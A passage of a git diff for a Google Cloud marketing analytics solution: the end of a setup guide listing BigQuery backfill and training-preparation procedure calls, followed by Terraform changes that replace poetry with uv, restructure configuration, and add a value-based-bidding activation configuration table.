`{pipeline-name}.execution.schedule` block to modify the scheduled time for each pipeline you gonna need to orchestrate that enables your use case. 
Here is a list of pipelines you need for every use case. - -- **Aggregated Value Based Bidding**: `feature-creation-aggregated-value-based-bidding`, `value_based_bidding.training`, `value_based_bidding.explanation` -- **Demographic Audience Segmentation**: `feature-creation-audience-segmentation`, `segmentation.training`, `segmentation.prediction` -- **Interest based Audience Segmentation**: `feature-creation-auto-audience-segmentation`, `auto_segmentation.training`, `auto_segmentation.prediction` -- **Purchase Propensity**: `feature-creation-purchase-propensity`, `purchase_propensity.training`, `purchase_propensity.prediction` -- **Customer Lifetime Value**: `feature-creation-customer-ltv`, `propensity_clv.training`, `clv.training`, `clv.prediction` -- **Churn Propensity**: `feature-creation-churn-propensity`, `churn_propensity.training`, `churn_propensity.prediction` - -After you change these configurations, make sure you apply these changes in your deployed resources by re-running terraform. - -```bash -terraform -chdir="${TERRAFORM_RUN_DIR}" apply -``` - -You can trigger your Cloud Workflow to execute your Dataform workflow at any time, or you can wait until the next day when the Cloud Workflow is going to be executed according to your schedule. There are two components in this solution that requires data for proper installation and functioning. One is the Looker Studio Dashboard, you only deploy the dashboard after you have executed all the steps in this Guide successfully. Another is the ML pipeline, the pipelines compilation requires views and tables to be created so that it can read their schema and define the column transformations to run during the pipeline execution. - -To manually start the data flow you must perform the following tasks: - -1. Run the Cloud Workflow - - On the Google Cloud console, navigate to Workflows page. You will see a Workflow named `dataform-prod-incremental`, then under Actions, click on the three dots and `Execute` the Workflow. - - **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 and Ads BigQuery datasets, it can take several minutes or hours to process all the data. Make sure that the processing has completed successfully before you continue to the next step. - -1. Invoke the BigQuery stored procedures having the prefix `invoke_backfill_*` to backfill the feature store in case the GA4 Export has been enabled before installing Marketing Analytics Jumpstart. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## There is no need to backfill the aggregated value based bidding features since there - ## is no aggregations performed before training. 
The transformation was applied in the - ## Marketing Data Store - - ## Backfill customer ltv tables - CALL `feature_store.invoke_backfill_customer_lifetime_value_label`(); - CALL `feature_store.invoke_backfill_user_lifetime_dimensions`(); - CALL `feature_store.invoke_backfill_user_rolling_window_lifetime_metrics`(); - - ## Backfill purchase propensity tables - CALL `feature_store.invoke_backfill_user_dimensions`(); - CALL `feature_store.invoke_backfill_user_rolling_window_metrics`(); - CALL `feature_store.invoke_backfill_purchase_propensity_label`(); - - ## Backfill audience segmentation tables - CALL `feature_store.invoke_backfill_user_segmentation_dimensions`(); - CALL `feature_store.invoke_backfill_user_lookback_metrics`(); - - ## There is no need to backfill the auto audience segmentation features since - ## they are dynamically prepared in the feature engineering pipeline using - ## python code - - ## Backfill churn propensity tables - ## This use case reuses the user_dimensions and user_rolling_window_metrics, - ## make sure you invoke the backfill for these tables. CALLs are listed above - ## under backfill purchase propensity - CALL `feature_store.invoke_backfill_churn_propensity_label`(); - - ## Backfill for gemini insights - CALL `feature_store.invoke_backfill_user_scoped_metrics`(); - CALL `gemini_insights.invoke_backfill_user_behaviour_revenue_insights`(); - ``` - - **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 BigQuery datasets over the last six months, it can take several hours to backfill the feature data so that you can train your ML model. Make sure that the backfill procedures starts without errors before you continue to the next step. - -1. Check whether the feature store tables you have run backfill have rows in it. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## There are no tables used by the aggregated value based bidding use case - ## in the feature store. - - ## Checking customer ltv tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.customer_lifetime_value_label`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lifetime_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_lifetime_metrics`; - - ## Checking purchase propensity tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.purchase_propensity_label`; - - ## Checking audience segmentation tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_segmentation_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lookback_metrics`; - - ## There are no tables used by the auto audience segmentation use case - ## in the feature store. - - ## Checking churn propensity tables are not empty - ## This use case reuses the user_dimensions and user_rolling_window_metrics, - ## make sure you invoke the backfill for these tables. 
CALLs are listed above - ## under the instructions for backfill purchase propensity - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.churn_propensity_label`; - - ## Checking gemini insights tables are not empty - SELECT COUNT(feature_date) FROM `feature_store.user_scoped_metrics`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_daily`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_weekly`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_monthly`; - ``` - -1. Redeploy the ML pipelines using Terraform. - - On your code editor, change the variable `deploy_pipelines` from `true` to `false`, on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars`. - Next, undeploy the ML pipelines component by applying the terraform configuration. - - ```bash - terraform -chdir="${TERRAFORM_RUN_DIR}" apply - ``` - - Now, to deploy the ML pipelines component again, revert your changes on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars` and apply the terraform configuration by running the commad above again. - - **Note:** The training pipelines use schemas defined by a `custom_transformations` parameter in your `config.yaml` or by the training table/view schema itself. - So at first, during the first deployment i.e. `tf apply`, because the views are not created yet, we assume a fixed schema in case no `custom_transformations` parameter is provided. - Then, you need to redeploy to make sure that since all the table views exist now, redeploy the pipelines to make sure you fetch the right schema to be provided to the training pipelines. - -1. Once the feature store is populated and the pipelines are redeployed, manually invoke the BigQuery procedures for preparing the training datasets, which have the suffix `_training_preparation`. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## Training preparation for Aggregated Value Based Bidding - CALL `aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation`(); - - ## Training preparation for Customer Lifetime Value - CALL `customer_lifetime_value.invoke_customer_lifetime_value_training_preparation`(); - - ## Training preparation for Purchase Propensity - CALL `purchase_propensity.invoke_purchase_propensity_training_preparation`(); - - ## Training preparation for Audience Segmentation - CALL `audience_segmentation.invoke_audience_segmentation_training_preparation`(); - - ## Training preparation for Auto Audience Segmentation - CALL `auto_audience_segmentation.invoke_auto_audience_segmentation_training_preparation`(); - - ## Training preparation for Churn Propensity - CALL `churn_propensity.invoke_churn_propensity_training_preparation`(); - - ## There is no need to prepare training data for the gemini insights use case. - ## Gemini insights only require feature engineering the inference pipelines. - ## The gemini insights are saved in the gemini insights dataset, specified in the `config.yaml.tftpl` file. - ``` - -1. Check whether the training preparation tables you have run the procedures above have rows in it. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. 
- ```sql - ## Checking aggregated value based bidding tables are not empty. - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT * FROM `aggregated_vbb.aggregated_value_based_bidding_training_full_dataset`; - - ## Checking customer ltv tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `customer_lifetime_value.customer_lifetime_value_training_full_dataset`; - - ## Checking purchase propensity tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `purchase_propensity.purchase_propensity_training_full_dataset`; - - ## Checking audience segmentation tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `audience_segmentation.audience_segmentation_training_full_dataset`; - - ## Checking churn propensity tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `churn_propensity.churn_propensity_training_full_dataset`; - ``` -Your Marketing Analytics Jumpstart solution is ready for daily operation. Plan for the days you want your model(s) to be trained, change the scheduler dates in the `config.yaml.tftpl` file or manually trigger training whenever you want. For more information, read the documentations in the [docs/ folder](../../docs/). diff --git a/infrastructure/terraform/main.tf b/infrastructure/terraform/main.tf index e2186b06..4c3054f3 100644 --- a/infrastructure/terraform/main.tf +++ b/infrastructure/terraform/main.tf @@ -42,23 +42,28 @@ provider "google" { region = var.google_default_region } +data "google_project" "main_project" { + provider = google + project_id = var.main_project_id +} + data "google_project" "feature_store_project" { - provider = google + provider = google project_id = var.feature_store_project_id } data "google_project" "activation_project" { - provider = google + provider = google project_id = var.activation_project_id } data "google_project" "data_processing_project" { - provider = google + provider = google project_id = var.data_processing_project_id } data "google_project" "data_project" { - provider = google + provider = google project_id = var.data_project_id } @@ -66,36 +71,36 @@ data "google_project" "data_project" { # The locals block is used to define variables that are used in the configuration. locals { # The source_root_dir is the root directory of the project. - source_root_dir = "../.." + source_root_dir = "../.." # The config_file_name is the name of the config file. - config_file_name = "config" - # The poetry_run_alias is the alias of the poetry command. - poetry_run_alias = "${var.poetry_cmd} run" + config_file_name = "config" + # The uv_run_alias is the alias of the uv run command. + uv_run_alias = "${var.uv_cmd} run" # The mds_dataset_suffix is the suffix of the marketing data store dataset. - mds_dataset_suffix = var.create_staging_environment ? "staging" : var.create_dev_environment ? "dev" : "prod" + mds_dataset_suffix = var.property_id # The project_toml_file_path is the path to the project.toml file. 
- project_toml_file_path = "${local.source_root_dir}/pyproject.toml" + project_toml_file_path = "${local.source_root_dir}/pyproject.toml" # The project_toml_content_hash is the hash of the project.toml file. # This is used for the triggers of the local-exec provisioner. project_toml_content_hash = filesha512(local.project_toml_file_path) # The generated_sql_queries_directory_path is the path to the generated sql queries directory. generated_sql_queries_directory_path = "${local.source_root_dir}/sql/query" # The generated_sql_queries_fileset is the list of files in the generated sql queries directory. - generated_sql_queries_fileset = [for f in fileset(local.generated_sql_queries_directory_path, "*.sqlx") : "${local.generated_sql_queries_directory_path}/${f}"] + generated_sql_queries_fileset = [for f in fileset(local.generated_sql_queries_directory_path, "*.sqlx") : "${local.generated_sql_queries_directory_path}/${f}"] # The generated_sql_queries_content_hash is the sha512 hash of file sha512 hashes in the generated sql queries directory. - generated_sql_queries_content_hash = sha512(join("", [for f in local.generated_sql_queries_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + generated_sql_queries_content_hash = sha512(join("", [for f in local.generated_sql_queries_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) # The generated_sql_procedures_directory_path is the path to the generated sql procedures directory. generated_sql_procedures_directory_path = "${local.source_root_dir}/sql/procedure" # The generated_sql_procedures_fileset is the list of files in the generated sql procedures directory. - generated_sql_procedures_fileset = [for f in fileset(local.generated_sql_procedures_directory_path, "*.sqlx") : "${local.generated_sql_procedures_directory_path}/${f}"] + generated_sql_procedures_fileset = [for f in fileset(local.generated_sql_procedures_directory_path, "*.sqlx") : "${local.generated_sql_procedures_directory_path}/${f}"] # The generated_sql_procedures_content_hash is the sha512 hash of file sha512 hashes in the generated sql procedures directory. - generated_sql_procedures_content_hash = sha512(join("", [for f in local.generated_sql_procedures_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + generated_sql_procedures_content_hash = sha512(join("", [for f in local.generated_sql_procedures_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) } -# Create a configuration file for the feature store. +# Create a configuration file for the solution. # the template file is located at -# ${local.source_root_dir}/config/${var.feature_store_config_env}.yaml.tftpl. +# ${local.source_root_dir}/config/${var.global_config_env}.yaml.tftpl. # This variable can be set in the terraform.tfvars file. Its default value is "config". # #The template file contains the configuration for the feature store. @@ -109,12 +114,12 @@ locals { # pipelines_github_owner: The owner of the GitHub repository that contains the pipelines code. # pipelines_github_repo: The name of the GitHub repository that contains the pipelines code. # location: The location in which the feature store will be created. 
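After `terraform apply`, the configuration template described above is rendered to `config/config.yaml` at the repository root (the default `config` file name). A minimal sketch of a sanity check that the variable substitution worked; the key names listed here are illustrative, so adjust them to whatever appears in your rendered YAML:

```bash
# Confirm the rendered solution configuration picked up your project values.
# Key names are illustrative; inspect your generated config/config.yaml as needed.
grep -E "project_id|project_number|cloud_region|mds_dataset" config/config.yaml
```
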
-resource "local_file" "feature_store_configuration" { +resource "local_file" "global_configuration" { filename = "${local.source_root_dir}/config/${local.config_file_name}.yaml" - content = templatefile("${local.source_root_dir}/config/${var.feature_store_config_env}.yaml.tftpl", { - project_id = var.feature_store_project_id - project_name = data.google_project.feature_store_project.name - project_number = data.google_project.feature_store_project.number + content = templatefile("${local.source_root_dir}/config/${var.global_config_env}.yaml.tftpl", { + project_id = var.main_project_id + project_name = data.google_project.main_project.name + project_number = data.google_project.main_project.number cloud_region = var.google_default_region mds_project_id = var.data_project_id mds_dataset = "${var.mds_dataset_prefix}_${local.mds_dataset_suffix}" @@ -122,43 +127,30 @@ resource "local_file" "feature_store_configuration" { pipelines_github_owner = var.pipelines_github_owner pipelines_github_repo = var.pipelines_github_repo # TODO: this needs to be specific to environment. - location = var.destination_data_location + location = var.destination_data_location + time_zone = var.time_zone + pipeline_configuration = var.pipeline_configuration + non_ecomm_events_list = var.non_ecomm_events_list + non_ecomm_target_event = var.non_ecomm_target_event }) } -# Runs the poetry command to install the dependencies. -# The command is: poetry install -resource "null_resource" "poetry_install" { - triggers = { - create_command = "${var.poetry_cmd} lock && ${var.poetry_cmd} install" - source_contents_hash = local.project_toml_content_hash - } - - # Only run the command when `terraform apply` executes and the resource doesn't exist. - provisioner "local-exec" { - when = create - command = self.triggers.create_command - working_dir = local.source_root_dir - } -} - data "external" "check_ga4_property_type" { - program = ["bash", "-c", "${local.poetry_run_alias} ga4-setup --ga4_resource=check_property_type --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] + program = ["bash", "-c", "${local.uv_run_alias} ga4-setup --ga4_resource=check_property_type --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] working_dir = local.source_root_dir - depends_on = [null_resource.poetry_install] } -# Runs the poetry invoke command to generate the sql queries and procedures. +# Runs the uv invoke command to generate the sql queries and procedures. # This command is executed before the feature store is created. resource "null_resource" "generate_sql_queries" { triggers = { # The create command generates the sql queries and procedures. - # The command is: poetry inv [function_name] --env-name=${local.config_file_name} + # The command is: uv inv [function_name] --env-name=${local.config_file_name} # The --env-name argument is the name of the configuration file. create_command = <<-EOT - ${local.poetry_run_alias} inv apply-config-parameters-to-all-queries --env-name=${local.config_file_name} - ${local.poetry_run_alias} inv apply-config-parameters-to-all-procedures --env-name=${local.config_file_name} + ${local.uv_run_alias} inv apply-config-parameters-to-all-queries --env-name=${local.config_file_name} + ${local.uv_run_alias} inv apply-config-parameters-to-all-procedures --env-name=${local.config_file_name} EOT # The destroy command removes the generated sql queries and procedures. 
@@ -170,14 +162,10 @@ resource "null_resource" "generate_sql_queries" { # The working directory is the root of the project. working_dir = local.source_root_dir - # The poetry_installed trigger is the ID of the null_resource.poetry_install resource. - # This is used to ensure that the poetry command is run before the generate_sql_queries command. - poetry_installed = null_resource.poetry_install.id - # The source_contents_hash trigger is the hash of the project.toml file. # This is used to ensure that the generate_sql_queries command is run only if the project.toml file has changed. # It also ensures that the generate_sql_queries command is run only if the sql queries and procedures have changed. - source_contents_hash = local_file.feature_store_configuration.content_sha512 + source_contents_hash = local_file.global_configuration.content_sha512 destination_queries_hash = local.generated_sql_queries_content_hash destination_procedures_hash = local.generated_sql_procedures_content_hash } @@ -204,108 +192,10 @@ resource "null_resource" "generate_sql_queries" { } } - -module "initial_project_services" { - source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" - - disable_dependent_services = false - disable_services_on_destroy = false - - project_id = var.tf_state_project_id - - activate_apis = [ - "cloudresourcemanager.googleapis.com", - "serviceusage.googleapis.com", - "iam.googleapis.com" - ] -} - -# This resource executes gcloud commands to check whether the Cloud Resource Manager API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_cloudresourcemanager_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.initial_project_services.project_id} | grep -i "cloudresourcemanager.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "cloudresourcemanager api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - - -# This resource executes gcloud commands to check whether the service usage API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_serviceusage_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.initial_project_services.project_id} | grep -i "serviceusage.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "serviceusage api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - - -# This resource executes gcloud commands to check whether the IAM API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_iam_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! 
gcloud services list --project=${module.initial_project_services.project_id} | grep -i "iam.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "iam api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - # Create the data store module. # The data store module creates the marketing data store in BigQuery, creates the ETL pipeline in Dataform # for the marketing data from Google Ads and Google Analytics. -# The data store is created only if the `create_prod_environment`, `create_staging_environment` -# or `create_dev_environment` variable is set to true in the terraform.tfvars file. +# The data store is created only if the `deploy_dataform` variable is set to true in the terraform.tfvars file. # The data store is created in the `data_project_id` project. module "data_store" { # The source directory of the data store module. @@ -315,14 +205,14 @@ module "data_store" { google_default_region = var.google_default_region # The dataform_region is set in the terraform.tfvars file. Its default value is "us-central1". - dataform_region = var.dataform_region + dataform_region = var.dataform_region # The source_ga4_export_project_id is set in the terraform.tfvars file. # The source_ga4_export_dataset is set in the terraform.tfvars file. # The source_ads_export_data is set in the terraform.tfvars file. - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - source_ads_export_data = var.source_ads_export_data + source_ga4_export_project_id = var.source_ga4_export_project_id + source_ga4_export_dataset = var.source_ga4_export_dataset + source_ads_export_data = var.source_ads_export_data ga4_incremental_processing_days_back = var.ga4_incremental_processing_days_back # The data_processing_project_id is set in the terraform.tfvars file. @@ -331,24 +221,16 @@ module "data_store" { data_processing_project_id = var.data_processing_project_id data_project_id = var.data_project_id destination_data_location = var.destination_data_location - + # The dataform_github_repo is set in the terraform.tfvars file. # The dataform_github_token is set in the terraform.tfvars file. dataform_github_repo = var.dataform_github_repo dataform_github_token = var.dataform_github_token - # The create_dev_environment is set in the terraform.tfvars file. - # The create_dev_environment determines if the dev environment is created. - # When the value is true, the dev environment is created. - # The create_staging_environment is set in the terraform.tfvars file. - # The create_staging_environment determines if the staging environment is created. - # When the value is true, the staging environment is created. - # The create_prod_environment is set in the terraform.tfvars file. - # The create_prod_environment determines if the prod environment is created. - # When the value is true, the prod environment is created. - create_dev_environment = var.create_dev_environment - create_staging_environment = var.create_staging_environment - create_prod_environment = var.create_prod_environment + # The create_dataform determines if dataform is created. + # When the value is true, the dataform environment is created. + deploy_dataform = var.deploy_dataform + property_id = var.property_id # The dev_data_project_id is the project ID of where the dev datasets will created. 
#If not provided, data_project_id will be used. @@ -374,9 +256,31 @@ module "data_store" { # The project_owner_email is set in the terraform.tfvars file. # An example of a valid email address is "william.mckinley@my-own-personal-domain.com". project_owner_email = var.project_owner_email + + # Set the time zone for the scheduled jobs + time_zone = var.time_zone } +#module "purchase_propensity" { +# # The source is the path to the feature store module. +# source = "./modules/purchase-propensity" +# config_file_path = local_file.global_configuration.id != "" ? local_file.global_configuration.filename : "" +# enabled = var.deploy_purchase_propensity +# # the count determines if the feature store is created or not. +# # If the count is 1, the feature store is created. +# # If the count is 0, the feature store is not created. +# # This is done to avoid creating the feature store if the `deploy_purchase_propensity` variable is set to false in the terraform.tfvars file. +# count = var.deploy_purchase_propensity ? 1 : 0 +# project_id = var.feature_store_project_id +# # The region is the region in which the feature store is created. +# # This is set to the default region in the terraform.tfvars file. +# region = var.google_default_region +# # The sql_dir_input is the path to the sql directory. +# # This is set to the path to the sql directory in the feature store module. +# sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" +#} + # Create the feature store module. # The feature store module creates the feature store and the sql queries and procedures in BigQuery. @@ -385,20 +289,20 @@ module "data_store" { module "feature_store" { # The source is the path to the feature store module. source = "./modules/feature-store" - config_file_path = local_file.feature_store_configuration.id != "" ? local_file.feature_store_configuration.filename : "" + config_file_path = local_file.global_configuration.id != "" ? local_file.global_configuration.filename : "" enabled = var.deploy_feature_store # the count determines if the feature store is created or not. # If the count is 1, the feature store is created. # If the count is 0, the feature store is not created. # This is done to avoid creating the feature store if the `deploy_feature_store` variable is set to false in the terraform.tfvars file. - count = var.deploy_feature_store ? 1 : 0 - project_id = var.feature_store_project_id + count = var.deploy_feature_store ? 1 : 0 + project_id = var.feature_store_project_id # The region is the region in which the feature store is created. # This is set to the default region in the terraform.tfvars file. - region = var.google_default_region + region = var.google_default_region # The sql_dir_input is the path to the sql directory. # This is set to the path to the sql directory in the feature store module. - sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" + sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" } @@ -410,19 +314,16 @@ module "feature_store" { module "pipelines" { # The source is the path to the pipelines module. source = "./modules/pipelines" - config_file_path = local_file.feature_store_configuration.id != "" ? local_file.feature_store_configuration.filename : "" - poetry_run_alias = local.poetry_run_alias + config_file_path = local_file.global_configuration.id != "" ? 
local_file.global_configuration.filename : "" + uv_run_alias = local.uv_run_alias # The count determines if the pipelines are created or not. # If the count is 1, the pipelines are created. # If the count is 0, the pipelines are not created. # This is done to avoid creating the pipelines if the `deploy_pipelines` variable is set to false in the terraform.tfvars file. - count = var.deploy_pipelines ? 1 : 0 - # The poetry_installed trigger is the ID of the null_resource.poetry_install resource. - # This is used to ensure that the poetry command is run before the pipelines module is created. - poetry_installed = null_resource.poetry_install.id + count = var.deploy_pipelines ? 1 : 0 # The project_id is the project in which the data is stored. # This is set to the data project ID in the terraform.tfvars file. - mds_project_id = var.data_project_id + mds_project_id = var.data_project_id } @@ -433,53 +334,50 @@ module "pipelines" { # The activation function is created in the `activation_project_id` project. module "activation" { # The source is the path to the activation module. - source = "./modules/activation" + source = "./modules/activation" # The project_id is the project in which the activation function is created. # This is set to the activation project ID in the terraform.tfvars file. - project_id = var.activation_project_id + project_id = var.activation_project_id # The project number of where the activation function is created. # This is retrieved from the activation project id using the google_project data source. - project_number = data.google_project.activation_project.number + project_number = data.google_project.activation_project.number # The location is the google_default_region variable. # This is set to the default region in the terraform.tfvars file. - location = var.google_default_region + location = var.google_default_region # The data_location is the destination_data_location variable. # This is set to the destination data location in the terraform.tfvars file. - data_location = var.destination_data_location + data_location = var.destination_data_location # The trigger_function_location is the location of the trigger function. # The trigger function is used to trigger the activation function. # The trigger function is created in the same region as the activation function. trigger_function_location = var.google_default_region - # The poetry_cmd is the poetry_cmd variable. - # This can be set on the poetry_cmd in the terraform.tfvars file. - poetry_cmd = var.poetry_cmd + # The uv_run_alias is the uv_run_alias variable. + # This can be set on the uv_cmd in the terraform.tfvars file. + uv_run_alias = local.uv_run_alias # The ga4_measurement_id is the ga4_measurement_id variable. # This can be set on the ga4_measurement_id in the terraform.tfvars file. - ga4_measurement_id = var.ga4_measurement_id + ga4_measurement_id = var.ga4_measurement_id # The ga4_measurement_secret is the ga4_measurement_secret variable. # This can be set on the ga4_measurement_secret in the terraform.tfvars file. - ga4_measurement_secret = var.ga4_measurement_secret + ga4_measurement_secret = var.ga4_measurement_secret # The ga4_property_id is the ga4_property_id variable. # This is set on the ga4_property_id in the terraform.tfvars file. # The ga4_property_id is the property ID of the GA4 data. # You can find the property ID in the GA4 console. - ga4_property_id = var.ga4_property_id + ga4_property_id = var.ga4_property_id # The ga4_stream_id is the ga4_stream_id variable. 
# This is set on the ga4_stream_id in the terraform.tfvars file. # The ga4_stream_id is the stream ID of the GA4 data. # You can find the stream ID in the GA4 console. - ga4_stream_id = var.ga4_stream_id + ga4_stream_id = var.ga4_stream_id # The count determines if the activation function is created or not. # If the count is 1, the activation function is created. # If the count is 0, the activation function is not created. # This is done to avoid creating the activation function if the `deploy_activation` variable is set # to false in the terraform.tfvars file. - count = var.deploy_activation ? 1 : 0 - # The poetry_installed is the ID of the null_resource poetry_install - # This is used to ensure that the poetry command is run before the activation module is created. - poetry_installed = null_resource.poetry_install.id - mds_project_id = var.data_project_id - mds_dataset_suffix = local.mds_dataset_suffix + count = var.deploy_activation ? 1 : 0 + mds_project_id = var.data_project_id + mds_dataset_suffix = local.mds_dataset_suffix # The project_owner_email is set in the terraform.tfvars file. # An example of a valid email address is "william.mckinley@my-own-personal-domain.com". @@ -493,14 +391,16 @@ module "activation" { # The monitoring resources are created only if the `deploy_monitoring` variable is set to true in the terraform.tfvars file. # The monitoring resources are created in the `data_project_id` project. module "monitoring" { - source = "./modules/monitor" - count = var.deploy_monitoring ? 1 : 0 - project_id = var.data_project_id - location = var.google_default_region - mds_project_id = var.data_project_id - mds_dataset_suffix = local.mds_dataset_suffix - mds_location = var.google_default_region - mds_dataform_workspace = var.dataform_workspace - feature_store_project_id = var.feature_store_project_id - activation_project_id = var.activation_project_id + source = "./modules/monitor" + count = var.deploy_monitoring ? 1 : 0 + project_id = var.data_project_id + location = var.google_default_region + mds_project_id = var.data_project_id + mds_dataset_suffix = local.mds_dataset_suffix + mds_location = var.google_default_region + mds_dataform_workspace = var.dataform_workspace + feature_store_project_id = var.feature_store_project_id + activation_project_id = var.activation_project_id + purchase_propensity_dataset_id = module.feature_store[0].purchase_propensity_dataset_id + smart_bidding_configuration_table = module.activation[0].configuration_table_name } diff --git a/infrastructure/terraform/modules/activation/configuration-tables.tf b/infrastructure/terraform/modules/activation/configuration-tables.tf new file mode 100644 index 00000000..6d80eb51 --- /dev/null +++ b/infrastructure/terraform/modules/activation/configuration-tables.tf @@ -0,0 +1,69 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
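The new `configuration-tables.tf` below uploads a JSONL configuration file to the pipeline bucket and creates a stored procedure plus a BigQuery table that maps predicted deciles to monetary values. Once deployed, one way to load and inspect that configuration from the BigQuery CLI; a minimal sketch, assuming the activation dataset keeps its default `activation` name:

```bash
# Load the JSONL configuration from GCS into BigQuery via the stored procedure,
# then review the decile-to-value mapping used for Smart Bidding activation.
bq query --use_legacy_sql=false 'CALL `activation.load_vbb_activation_configuration`();'
bq query --use_legacy_sql=false 'SELECT * FROM `activation.vbb_activation_configuration` LIMIT 10;'
```
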
+
+locals {
+  config_id                         = "vbb_activation_configuration"
+  vbb_activation_configuration_file = "${local.config_id}.jsonl"
+}
+
+# JSON configuration file for smart bidding based activation
+resource "google_storage_bucket_object" "vbb_activation_configuration_file" {
+  name   = "${local.configuration_folder}/${local.vbb_activation_configuration_file}"
+  source = "${local.template_dir}/${local.vbb_activation_configuration_file}"
+  bucket = module.pipeline_bucket.name
+}
+
+# This data block renders a template file and stores the rendered content in a variable.
+data "template_file" "load_vbb_activation_configuration_proc" {
+  template = file("${local.template_dir}/load_${local.config_id}.sql.tpl")
+  vars = {
+    project_id      = module.project_services.project_id
+    dataset         = module.bigquery.bigquery_dataset.dataset_id
+    config_file_uri = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.vbb_activation_configuration_file.output_name}"
+  }
+}
+
+# Stored procedure that loads the JSON configuration file from GCS into a configuration table in BQ
+resource "google_bigquery_routine" "load_vbb_activation_configuration_proc" {
+  project         = module.project_services.project_id
+  dataset_id      = module.bigquery.bigquery_dataset.dataset_id
+  routine_id      = "load_${local.config_id}"
+  routine_type    = "PROCEDURE"
+  language        = "SQL"
+  definition_body = data.template_file.load_vbb_activation_configuration_proc.rendered
+  description     = "Procedure for loading vbb activation configuration from GCS bucket"
+}
+
+# This resource creates a BigQuery table named vbb_activation_configuration
+resource "google_bigquery_table" "smart_bidding_configuration" {
+  project     = module.project_services.project_id
+  dataset_id  = module.bigquery.bigquery_dataset.dataset_id
+  table_id    = local.config_id
+  description = "Stores configuration settings used to translate predicted deciles into monetary values for Smart Bidding strategies."
+
+  # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted.
+  deletion_protection = false
